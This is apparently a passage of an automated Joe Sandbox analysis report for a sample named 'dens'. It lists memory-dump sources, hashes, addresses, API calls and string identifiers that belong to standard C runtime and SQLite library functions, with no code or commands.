                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 3510742995-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 82882c0c8ae97d424e1c106e57682a3131d3c85fc700fa23b5bc464ad95a1b36
                                                                                                                                                                                                                                              • Instruction ID: d57a5fe8137414b4107139b392bf1917a3bdb8d38442a5fe3e4ae992ac0ea149
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82882c0c8ae97d424e1c106e57682a3131d3c85fc700fa23b5bc464ad95a1b36
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F1AE72708B818ADB98CF55E054BAD77A4FB49B88F508036EE9E47799DF39D844C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 2221118986-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 6f452dc5023fa386c57eeef692d5ae6c27b56862746b7898d214a5848d1ce0d7
                                                                                                                                                                                                                                              • Instruction ID: cf09d9351759d214c1ad3411f18899d4757791f49c85a60a7ae722fcc3071fe4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f452dc5023fa386c57eeef692d5ae6c27b56862746b7898d214a5848d1ce0d7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73D17C72708A8586DB58CF25D024AA977F4FB88B88F558076DF5D47798EF39D882C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFABFA0B5,?,?,?), ref: 00007FFDFABF98F0
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFABFA0B5,?,?,?), ref: 00007FFDFABF9A37
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                                                              • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 1297977491-2903559916
                                                                                                                                                                                                                                              • Opcode ID: 1b4000d05f1bd8cdd71e49d72771d699f0f9a7748b10584b5e73e00e31599616
                                                                                                                                                                                                                                              • Instruction ID: eb464ef1df8e434b011375af22ccf13ac784ae45ea0452947bfe5043ad894288
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4000d05f1bd8cdd71e49d72771d699f0f9a7748b10584b5e73e00e31599616
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6B1BF2AB096C385EB699B959460BB96790EF41B84F8D81B5CE6D077DDDF3CE801C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD59A
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD5C4
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD5E2
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD617
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                              • API String ID: 438689982-2852464175
                                                                                                                                                                                                                                              • Opcode ID: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
                                                                                                                                                                                                                                              • Instruction ID: ca5c7920dc9910897f42cd37570de8471e108f9bb8e424cbdc5d414bc8a6797b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 514d7303eeb31d981147c69c7a56ef58d2f0ef438fa373e1b1835ae557823639
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F919F7671964186EB2C8E16D460B7A67A0FB84BD4F944676DEBE477C8CF3CE4508B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 3510742995-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 8ec60ca20c84ac8b4ec9e29fae1a96b76e6f7017699913c20ceb1c8c2236ccaa
                                                                                                                                                                                                                                              • Instruction ID: 61eeab15ba7582e35cb6693b1f5c6b8aada3546262c82a8248f6cfdfab02d0a2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec60ca20c84ac8b4ec9e29fae1a96b76e6f7017699913c20ceb1c8c2236ccaa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD81F132B087868AD7688F29D464BAE77A4FB88788F408076EB5D477D9CF38D445C700
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              • Opcode ID: d6c234829527da0e6d0581c2bd27627037928653f1d9a952e892e83a93fd6a9d
                                                                                                                                                                                                                                              • Instruction ID: 4ddb82cf5650e3fa561b0dad66de786673d4c6d8beb449a0c6c003ff3f21efc4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6c234829527da0e6d0581c2bd27627037928653f1d9a952e892e83a93fd6a9d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 728127227082D15AD7688B65D1A0ABE7BA0FB44788F488176DFAD476D9CF3CF455C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D949
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D963
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFAC0DA8A,?,?,?,00007FFDFAC0DE4B), ref: 00007FFDFAC0D9F7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strncmp$memcpy
                                                                                                                                                                                                                                              • String ID: CRE$INS
                                                                                                                                                                                                                                              • API String ID: 2549481713-4116259516
                                                                                                                                                                                                                                              • Opcode ID: 42b0215926e769c5e52d6913751ab663a596e2a78c0b585186779095b722048e
                                                                                                                                                                                                                                              • Instruction ID: a901024d5df946ebdb6ba79aa136e8138cae22dd82a0136d1bf4e85de990363e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42b0215926e769c5e52d6913751ab663a596e2a78c0b585186779095b722048e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8651A229B0965240EB5A9B16A470A7D67A1BF80FC4F5C81B1DD6D8B7DDDE3CE8418340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpymemmove
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 167125708-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 5bb49aed324d8c03b8d256e0ad89761a530f0eb7c9e1c8512ef4d3000247f6b9
                                                                                                                                                                                                                                              • Instruction ID: a585548a90cfb299a13e1328ebf6dc7a573d5d94216fbbe6fefeb4ea33ec4415
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb49aed324d8c03b8d256e0ad89761a530f0eb7c9e1c8512ef4d3000247f6b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58510172708BC085CB14CB55E4A89AEBBA4FB58788F55817AEB9E03798DF3CD052C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction ID: c0936150a246bbdc1847628288228c3b1f4df18014319b5539fea7cd5b03cd38
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09113322D68A8201FE54117EED9B37D1190AF79374E4C8634EA7E967DE8EEC6445C103
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B418
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                              • Instruction ID: 14cd283922234b1d585029a14ed1ac0fe22536fbb028d61e15a6918262ddd066
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1115E30F0D64281FE58A7269D5B27921429F457B0F588334ED7EC6BDAEE2DE5628303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                              • Instruction ID: ba2ef1308fe9006bf9a1ef374012ed1dea6c46e84785928743e1045b93af50d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02110524E4920781FD6CA2614C6B57E22824F8A770F184B34ED3ECA6D6ED2DB8614213
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: ef05407b4b7fce76a600297e839262fe213be2094b9ebd134a9a78217a82eb1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF91D472A08A5681FF619E24DC5A3BD3791AF81BA4F444136DE5D873D6DF3CE8258302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction ID: 495537817798efd58c7886186beb64db9423c0621514f747653eb7dd892779cd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9381BF72E0C24385FF659F29895B27836A1AB11BA8F558035DE0DD7285CF2EE922D303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction ID: 7423ddb91260109b893d9910f443cc667aa1400ac18253e2b175fc53b6cc337e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84518E36A197428EDF14CF15E844A787791EB44BA8F108135DE4E8B788EF7EE981C709
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction ID: 375ed67dc8ad28dc4d58ec569a2a90a070955ee2b5cd3aafd191282bf8908a82
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B617232908BC589EB609F15E8403AAB7A0FB85BA4F044225EF9C47B99DF7DD1D4CB05
